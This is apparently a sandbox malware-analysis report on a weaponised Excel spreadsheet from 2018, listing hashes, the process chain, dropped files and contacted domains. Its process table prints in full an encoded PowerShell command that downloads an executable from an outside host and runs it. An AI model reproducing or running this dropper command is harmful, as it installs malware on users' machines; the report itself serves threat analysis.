File name: | urgent order inquiry.xls |
Full analysis: | https://app.any.run/tasks/f874cc40-1d22-4543-8898-97aeecef1627 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 18:41:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Nov 13 23:35:05 2018, Last Saved Time/Date: Tue Nov 13 23:35:06 2018, Security: 0 |
MD5: | AADC2C7137EB83274D18916946310DDC |
SHA1: | 7B62775768B60EF1A1CDC7363B1F4DB6A36CC037 |
SHA256: | F83EB867F9B20E50DB102932C5825576E9284A7CE353F162EE844AB1A5679BBE |
SSDEEP: | 1536:oDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAclq4sXX45lNTC6a3htQna5sLVbITpA:oDZ+RwPONXoRjDhIcp0fDlaGGx+cL26w |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Author: | PC |
---|---|
LastModifiedBy: | PC |
Software: | Microsoft Excel |
CreateDate: | 2018:11:13 23:35:05 |
ModifyDate: | 2018:11:13 23:35:06 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 12 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
CompObjUserTypeLen: | 38 |
CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2972 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
2208 | cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAdwBwADcARwA1ADgAbABVAGYANQBfAEoAQwAzAGkAIAAoACAAJAByADcAVABmAFYAYQBIAGMASwBzAEoATQB5AFkAXwBvAFQAcABSAE8AUgByAF8AIAAsACAAJABhAGUARwBKAHQAQwBEADMASwAxAE4AegAyAHkANgBrAGgAbgBMAHUAWABzAHMAdwA1AFoAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJAByADcAVABmAFYAYQBIAGMASwBzAEoATQB5AFkAXwBvAFQAcABSAE8AUgByAF8AIAAsACAAJABhAGUARwBKAHQAQwBEADMASwAxAE4AegAyAHkANgBrAGgAbgBMAHUAWABzAHMAdwA1AFoAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAYQBlAEcASgB0AEMARAAzAEsAMQBOAHoAMgB5ADYAawBoAG4ATAB1AFgAcwBzAHcANQBaACAAKQA7ACAAfQANAAoAdAByAHkAewANAAoADQAKACQAWQBiAGwASwBiAEIAdgBwAFQASwBxAEgANgBYAEMARABFAGQAbwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwASQBiADkAXwAuAGUAeABlACcAOwANAAoAdwBwADcARwA1ADgAbABVAGYANQBfAEoAQwAzAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AcwB6AGEAbABxAGsALgBqAHAAZwAnACAAJABZAGIAbABLAGIAQgB2AHAAVABLAHEASAA2AFgAQwBEAEUAZABvADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\system32\cMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3696 | PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAdwBwADcARwA1ADgAbABVAGYANQBfAEoAQwAzAGkAIAAoACAAJAByADcAVABmAFYAYQBIAGMASwBzAEoATQB5AFkAXwBvAFQAcABSAE8AUgByAF8AIAAsACAAJABhAGUARwBKAHQAQwBEADMASwAxAE4AegAyAHkANgBrAGgAbgBMAHUAWABzAHMAdwA1AFoAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJAByADcAVABmAFYAYQBIAGMASwBzAEoATQB5AFkAXwBvAFQAcABSAE8AUgByAF8AIAAsACAAJABhAGUARwBKAHQAQwBEADMASwAxAE4AegAyAHkANgBrAGgAbgBMAHUAWABzAHMAdwA1AFoAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAYQBlAEcASgB0AEMARAAzAEsAMQBOAHoAMgB5ADYAawBoAG4ATAB1AFgAcwBzAHcANQBaACAAKQA7ACAAfQANAAoAdAByAHkAewANAAoADQAKACQAWQBiAGwASwBiAEIAdgBwAFQASwBxAEgANgBYAEMARABFAGQAbwA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwASQBiADkAXwAuAGUAeABlACcAOwANAAoAdwBwADcARwA1ADgAbABVAGYANQBfAEoAQwAzAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AcwB6AGEAbABxAGsALgBqAHAAZwAnACAAJABZAGIAbABLAGIAQgB2AHAAVABLAHEASAA2AFgAQwBEAEUAZABvADsADQAKAA0ACgB9AGMAYQB0AGMAaAB7AH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2912 | "C:\Users\admin\Ib9_.exe" | C:\Users\admin\Ib9_.exe | powershell.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2260 | "C:\Windows\System32\mstsc.exe" | C:\Windows\System32\mstsc.exe | — | Ib9_.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Remote Desktop Connection Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2972 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR98C1.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JMHE7CK8P7BA1W0F3MF7.temp | — | |
MD5:— | SHA256:— | |||
3696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5d9eac.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3696 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | |
MD5:DA6C793FB0533AF0139A6D76C9956547 | SHA256:BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D | |||
2912 | Ib9_.exe | C:\Users\admin\AppData\Local\Temp\Disk.sys | executable | |
MD5:3653AAD483FEF29ABA829531FA945DA9 | SHA256:E092829B18BAB14CD61B94BF3ACE60F760F6EF8FD02DD2411703284443322E9E | |||
3696 | powershell.exe | C:\Users\admin\Ib9_.exe | executable | |
MD5:3653AAD483FEF29ABA829531FA945DA9 | SHA256:E092829B18BAB14CD61B94BF3ACE60F760F6EF8FD02DD2411703284443322E9E | |||
2912 | Ib9_.exe | C:\Users\admin\AppData\Local\Chrome\StikyNot.exe | executable | |
MD5:3653AAD483FEF29ABA829531FA945DA9 | SHA256:E092829B18BAB14CD61B94BF3ACE60F760F6EF8FD02DD2411703284443322E9E |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3696 | powershell.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe |
| unknown |